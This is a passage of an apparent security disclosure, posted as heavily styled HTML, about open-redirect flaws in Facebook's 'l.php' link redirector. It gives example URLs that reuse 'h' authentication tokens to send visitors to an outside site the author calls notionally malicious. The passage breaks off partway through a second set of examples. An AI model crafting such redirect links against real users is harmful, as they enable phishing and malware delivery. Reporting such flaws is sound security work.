<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.facebook.com/l.php?u=http://www.bing.com&h=mAQHgtP_E" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.facebook.com/l.php?<wbr></wbr>u=http://www.bing.com&h=<wbr></wbr>mAQHgtP_E</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://facebook.com/campaign/landing.php?url=http://www.adcash.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://facebook.com/campaign/<wbr></wbr>landing.php?url=http://www.<wbr></wbr>adcash.com</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Though a new mechanism was adopted. However, all old generated redirections still work by parameter "h" and "eid". </span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.2)</b> A website was used for the following tests. The website is "<a href="http://www.tetraph.com/" target="_blank">http://www.tetraph.com/</a>". Suppose this website is malicious.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.2.1)</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><1>First test </span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a>file: "l.php" </span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>URL parameter: "u" </span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><c>authentication parameter: "h" </span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><d>form: "h=HAQHyinFq". </span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><e>The authentication has no relation with all other parameters, such as "s". </span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Examples:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>URL 1:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.aboutads.info%2F&h=lAQHmVMhS&s=1" target="_blank">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.aboutads.<wbr></wbr>info%2F&h=lAQHmVMhS&s=1</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Forbidden:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=lAQHmVMhS&s=1" target="_blank">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.tetraph.<wbr></wbr>com&h=lAQHmVMhS&s=1</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Works:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=zAQHEyzSM&s=1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.tetraph.<wbr></wbr>com&h=zAQHEyzSM&s=1</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>URL 2:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://bg-bg.facebook.com/l.php?u=http%3A%2F%2Fweborama.com%2F&h=DAQEpwCpS&s=1" target="_blank">http://bg-bg.facebook.com/l.<wbr></wbr>php?u=http%3A%2F%2Fweborama.<wbr></wbr>com%2F&h=DAQEpwCpS&s=1</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Forbidden:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://bg-bg.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=DAQEpwCpS&s=1" target="_blank">http://bg-bg.facebook.com/l.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>tetraph.com&h=DAQEpwCpS&s=1</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Works:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://bg-bg.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=wAQEE6xBX&s=1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://bg-bg.facebook.com/l.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>tetraph.com&h=wAQEE6xBX&s=1</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.2.2)</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><2>Second test. It is the same situation as above. </span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a>file: "l.php",</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>url parameter "u" </span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><c>authentication parameter: "h"</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><d>form: "h=<wbr></wbr>hAQHalW1CAQHrkVIQNNqgwhxRWLNsF<wbr></wbr>VeH3auuImlbR1CgKA". </span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><e>The authentication has no relation to all other parameters, such as "env", "s". </span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Examples:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>URL 1:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.internet.org%2F&h=pAQHnUOVGAQGcsXLy0MBttG7W1uiOvSghc_POwYa6k35hbw&enc=AZNBNYyWIbhPD6ZDAw1Zom458dO6dNBHnPh1tWnzEgxsxqvjfAbnH1ynSYgNNOvQzY7oolrIRfkll4-z2Pm7C63N&s=1" target="_blank">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.internet.<wbr></wbr>org%2F&h=<wbr></wbr>pAQHnUOVGAQGcsXLy0MBttG7W1uiOv<wbr></wbr>Sghc_POwYa6k35hbw&enc=<wbr></wbr>AZNBNYyWIbhPD6ZDAw1Zom458dO6dN<wbr></wbr>BHnPh1tWnzEgxsxqvjfAbnH1ynSYgN<wbr></wbr>NOvQzY7oolrIRfkll4-z2Pm7C63N&<wbr></wbr>s=1</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Forbidden:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=pAQHnUOVGAQGcsXLy0MBttG7W1uiOvSghc_POwYa6k35hbw&enc=AZNBNYyWIbhPD6ZDAw1Zom458dO6dNBHnPh1tWnzEgxsxqvjfAbnH1ynSYgNNOvQzY7oolrIRfkll4-Redirect" target="_blank">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.tetraph.<wbr></wbr>com&h=<wbr></wbr>pAQHnUOVGAQGcsXLy0MBttG7W1uiOv<wbr></wbr>Sghc_POwYa6k35hbw&enc=<wbr></wbr>AZNBNYyWIbhPD6ZDAw1Zom458dO6dN<wbr></wbr>BHnPh1tWnzEgxsxqvjfAbnH1ynSYgN<wbr></wbr>NOvQzY7oolrIRfkll4</a><a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.internet.org%2F&h=pAQHnUOVGAQGcsXLy0MBttG7W1uiOvSghc_POwYa6k35hbw&enc=AZNBNYyWIbhPD6ZDAw1Zom458dO6dNBHnPh1tWnzEgxsxqvjfAbnH1ynSYgNNOvQzY7oolrIRfkll4-z2Pm7C63N&s=1" target="_blank">-z2Pm7C63N&<wbr></wbr>s=1</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><b>Redirect Works:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=1AQFqhVX6AQGawLw_EuB6T8h4Fs6JXFOocaRp0tQKr6Mfxw&enc=AZM7oFmJObAuJmy999wnRjD-QralcP-Ust3CHBrFxZ85bS1oI5vS46cPhdJmYq6YcfsTcZYBrPTRsZyEeHCe_rdQ&s=1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.tetraph.<wbr></wbr>com&h=1AQFqhVX6AQGawLw_<wbr></wbr>EuB6T8h4Fs6JXFOocaRp0tQKr6Mfxw<wbr></wbr>&enc=AZM7oFmJObAuJmy999wnRjD-<wbr></wbr>QralcP-<wbr></wbr>Ust3CHBrFxZ85bS1oI5vS46cPhdJmY<wbr></wbr>q6YcfsTcZYBrPTRsZyEeHCe_rdQ&s=<wbr></wbr>1</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=1AQFqhVX6AQGawLw_EuB6T8h4Fs6JXFOocaRp0tQKr6Mfxw" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.tetraph.<wbr></wbr>com&h=1AQFqhVX6AQGawLw_<wbr></wbr>EuB6T8h4Fs6JXFOocaRp0tQKr6Mfxw</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>URL 2:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
